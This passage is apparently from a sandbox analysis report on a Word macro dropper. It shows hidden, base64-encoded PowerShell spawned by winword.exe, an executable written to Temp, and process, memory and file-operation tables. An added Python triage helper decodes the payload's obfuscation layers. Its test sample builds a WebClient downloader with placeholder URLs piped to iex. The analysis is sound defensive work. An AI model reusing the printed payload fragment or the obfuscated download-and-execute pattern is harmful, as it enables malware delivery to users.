tAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:23, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:02:02
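Added example, not part of the VMRay report and not code from the analyzed sample: a Python triage helper for the chain recorded above, where winword.exe creates pOwerSheLL -e <base64> with show_window = SW_HIDE and the Process #2 command line carries that payload. The -e argument is base64 of UTF-16LE text. In this report that text is itself a second layer of the form ('36}119z115@99G114h105h...' -split 'z' -split 'e' ... | %{([int]$_ -as [char])}) -join '' | ..., that is, decimal character codes separated by throw-away characters (36 is '$', 119 'w', 115 's', 99 'c', 114 'r', 105 'i'). The helper decodes both layers, pulls URLs out of the result and scores the process-creation event. Assumptions: the event field names, the constructed sample script with placeholder URLs, and the trailing | iex in that constructed sample. The only text taken from the report is the first 64 base64 characters of the Process #2 command line, used to check the first decoding step.

```python
"""Triage of a winword.exe -> powershell.exe -EncodedCommand chain.

Added example; recovers the script behind `pOwerSheLL -e <base64>` when the
decoded text uses the `'<codes>' -split 'x' ... [int]$_ -as [char]` layer.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# First 64 base64 characters of the Process #2 command line in the report
# (a multiple of 4, so they decode without guessing the truncated remainder).
PAGE_PREFIX_B64 = "KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgA"


def extract_encoded_command(cmdline):
    """Return the base64 argument of -e/-ec/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        # powershell.exe takes "-" or "/" and any unambiguous prefix of the name
        if tok[:1] in "-/" and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(b64):
    """Base64 -> UTF-16LE text; tolerates a truncated capture like the report's."""
    b64 = b64.strip().strip("'\"")
    if len(b64) % 4 == 1:          # a lone trailing sextet cannot be decoded
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)   # restore padding the capture may lack
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]   # drop a dangling half code unit
    return raw.decode("utf-16-le", errors="replace")


def deobfuscate_split_chars(script):
    """Reverse the decimal-codes-plus-separators layer; None if not present."""
    seps = re.findall(r"(?i)-split\s*'([^'])'", script)
    if not seps:
        return None
    sep_chars = re.escape("".join(seps))
    # the payload literal: only digits and separator characters, at least one digit
    m = re.search(r"'([\d" + sep_chars + r"]*\d[\d" + sep_chars + r"]*)'", script)
    if not m:
        return None
    pieces = [p for p in re.split("[" + sep_chars + "]+", m.group(1)) if p]
    try:
        return "".join(chr(int(p)) for p in pieces)
    except ValueError:             # a piece that is not a valid code point
        return None


def extract_urls(text):
    """Ordered, de-duplicated http(s) URLs found in the recovered script."""
    found = []
    for url in re.findall(r"https?://[^\s'\",;]+", text):
        if url not in found:
            found.append(url)
    return found


def triage_process_event(event):
    """Score one process-creation event and decode whatever it carries."""
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if parent in OFFICE_APPS and image in POWERSHELL:
        reasons.append(f"{parent} spawned {image}")
    if event.get("show_window") == "SW_HIDE":
        reasons.append("child window hidden (SW_HIDE)")
    decoded = deobfuscated = None
    urls = []
    b64 = extract_encoded_command(event["command_line"])
    if b64 is not None:
        reasons.append("-EncodedCommand payload")
        decoded = decode_encoded_command(b64)
        deobfuscated = deobfuscate_split_chars(decoded)
        urls = extract_urls(deobfuscated or decoded)
    return {"suspicious": len(reasons) >= 2, "reasons": reasons,
            "decoded": decoded, "deobfuscated": deobfuscated, "urls": urls}


def obfuscate_split_chars(plain, seps="zeS}G@"):
    """Build the same layer the sample uses (only to construct test input)."""
    body = "".join(str(ord(c)) + seps[i % len(seps)] for i, c in enumerate(plain))
    splits = " ".join(f"-split '{s}'" for s in seps)
    return f"('{body}' {splits} | %{{([int]$_ -as [char])}}) -join '' | iex"


# Constructed sample: shaped like the report's script, placeholder URLs (assumption).
SAMPLE_PLAINTEXT = ("$webclient = new-object System.Net.WebClient;"
                    "$urls = 'http://example.invalid/a/,http://example.invalid/b/'")
SAMPLE_B64 = base64.b64encode(
    obfuscate_split_chars(SAMPLE_PLAINTEXT).encode("utf-16-le")).decode("ascii")
SAMPLE_EVENT = {   # field names are assumptions; values mirror the report
    "parent_image": r"c:\program files\microsoft office\office15\winword.exe",
    "image": r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
    "command_line": "pOwerSheLL -e " + SAMPLE_B64,
    "show_window": "SW_HIDE",
}

if __name__ == "__main__":
    print(decode_encoded_command(PAGE_PREFIX_B64))
    for key, value in triage_process_event(SAMPLE_EVENT).items():
        print(f"{key}: {value}")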
OS Process Information
Information Value
PID 0xa68
Parent PID 0x9c4 (c:\program files\microsoft office\office15\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA6C, 0xA80, 0xA84, 0xA88, 0xA8C, 0xA90, 0xA94, 0xA9C, 0xAA4, 0xAA8, 0xAAC, 0xAB0, 0xACC, 0xAD8
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True True False
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False
powershell.exe.mui 0x001e0000 0x001e2fff Memory Mapped File Readable, Writable False False False
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True True False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000250000 0x00250000 0x00317fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory Readable True False False
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000350000 0x00350000 0x00450fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000460000 0x00460000 0x0105ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001060000 0x01060000 0x01061fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001070000 0x01070000 0x01070fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001080000 0x01080000 0x01081fff Pagefile Backed Memory Readable True False False
private_0x0000000001090000 0x01090000 0x010cffff Private Memory Readable, Writable True True False
pagefile_0x00000000010d0000 0x010d0000 0x011aefff Pagefile Backed Memory Readable True False False
private_0x00000000011b0000 0x011b0000 0x011effff Private Memory Readable, Writable, Executable True True False
cversions.2.db 0x011f0000 0x011f3fff Memory Mapped File Readable True False False
pagefile_0x0000000001200000 0x01200000 0x01200fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001210000 0x01210000 0x0121ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x01220000 0x014eefff Memory Mapped File Readable False False False
cversions.2.db 0x014f0000 0x014f3fff Memory Mapped File Readable True False False
pagefile_0x0000000001500000 0x01500000 0x01500fff Pagefile Backed Memory Readable True False False
private_0x0000000001510000 0x01510000 0x0154ffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x01550000 0x01575fff Memory Mapped File Readable True False False
private_0x0000000001580000 0x01580000 0x0167ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001680000 0x01680000 0x01a72fff Pagefile Backed Memory Readable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x01a80000 0x01aaffff Memory Mapped File Readable True False False
pagefile_0x0000000001ab0000 0x01ab0000 0x01ab0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001ac0000 0x01ac0000 0x01ac0fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001ad0000 0x01ad0000 0x01adffff Private Memory True True False
private_0x0000000001ae0000 0x01ae0000 0x01b1ffff Private Memory Readable, Writable True True False
private_0x0000000001b20000 0x01b20000 0x01b2ffff Private Memory True True False
private_0x0000000001b30000 0x01b30000 0x01b3ffff Private Memory True True False
private_0x0000000001b40000 0x01b40000 0x01b7ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01b80000 0x01be5fff Memory Mapped File Readable True False False
private_0x0000000001bf0000 0x01bf0000 0x01bfffff Private Memory True True False
private_0x0000000001c00000 0x01c00000 0x01c0ffff Private Memory True True False
private_0x0000000001c10000 0x01c10000 0x01c1ffff Private Memory True True False
private_0x0000000001c20000 0x01c20000 0x01c5ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001c60000 0x01c60000 0x01c9ffff Private Memory Readable, Writable True True False
private_0x0000000001ca0000 0x01ca0000 0x01d3ffff Private Memory Readable, Writable True True False
private_0x0000000001d40000 0x01d40000 0x01d4ffff Private Memory Readable, Writable True True False
l_intl.nls 0x01d50000 0x01d52fff Memory Mapped File Readable False False False
private_0x0000000001d60000 0x01d60000 0x01d60fff Private Memory Readable, Writable True True False
sorttbls.nlp 0x01d70000 0x01d74fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x01d80000 0x01d87fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000001d90000 0x01d90000 0x01d90fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001da0000 0x01da0000 0x01da0fff Pagefile Backed Memory Readable True False False
private_0x0000000001da0000 0x01da0000 0x01daffff Private Memory True True False
private_0x0000000001db0000 0x01db0000 0x01deffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0x01df0000 0x01eaffff Memory Mapped File Readable, Writable False False False
sortkey.nlp 0x01eb0000 0x01ef0fff Memory Mapped File Readable False False False
pagefile_0x0000000001f00000 0x01f00000 0x01f10fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory True True False
private_0x0000000001f30000 0x01f30000 0x01f6ffff Private Memory Readable, Writable True True False
private_0x0000000001f70000 0x01f70000 0x01f7ffff Private Memory True True False
private_0x0000000001f80000 0x01f80000 0x01f8ffff Private Memory Readable, Writable True True False
private_0x0000000001f90000 0x01f90000 0x03f8ffff Private Memory Readable, Writable True False False
system.management.automation.dll 0x03f90000 0x04271fff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.dll 0x04280000 0x042c2fff Memory Mapped File Readable, Writable, Executable False False False
mscorrc.dll 0x042d0000 0x04323fff Memory Mapped File Readable True False False
private_0x0000000004330000 0x04330000 0x0433ffff Private Memory True True False
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory True True False
private_0x0000000004350000 0x04350000 0x0435ffff Private Memory True True False
private_0x0000000004360000 0x04360000 0x0436ffff Private Memory True True False
powershell.exe 0x22160000 0x221d1fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
system.directoryservices.ni.dll 0x60820000 0x60933fff Memory Mapped File Readable, Writable, Executable True False False
system.management.ni.dll 0x60940000 0x60a43fff Memory Mapped File Readable, Writable, Executable True False False
system.xml.ni.dll 0x60a50000 0x60f85fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x60f90000 0x61052fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.utility.ni.dll 0x61060000 0x611fdfff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x61200000 0x61434fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x61440000 0x61cb9fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.dll 0x61cc0000 0x61fa1fff Memory Mapped File Readable, Writable, Executable False False False
system.ni.dll 0x61fb0000 0x6274bfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x62750000 0x63247fff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x63250000 0x637fafff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x639d0000 0x63a6bfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x63a70000 0x63af4fff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x63d80000 0x63df9fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x6bbc0000 0x6bc09fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x6d090000 0x6d0bcfff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x6d0c0000 0x6d0e4fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.consolehost.ni.dll 0x6d0f0000 0x6d170fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x6d180000 0x6d21afff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.commands.diagnostics.ni.dll 0x6d460000 0x6d4aafff Memory Mapped File Readable, Writable, Executable True False False
linkinfo.dll 0x6f110000 0x6f118fff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x6f120000 0x6f14dfff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x70100000 0x7016ffff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x70170000 0x7017afff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
shfolder.dll 0x72040000 0x72044fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x74190000 0x74199fff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x75290000 0x752a8fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd3000 0x7ffd3000 0x7ffd3fff Private Memory Readable, Writable True True False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True True False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True True False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
For performance reasons, the remaining 71 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe 100.00 KB (102400 bytes) MD5: d6c8126371d37ffe3100755db6aa22ed, SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42, SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec False
Host Behavior
COM (1)
Operation Class Interface Additional Information Success Count Logfile
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (328)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.config type = file_attributes False 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Desktop type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe type = file_type True 2
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe type = file_attributes True 3
Fn
Open STD_INPUT_HANDLE True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
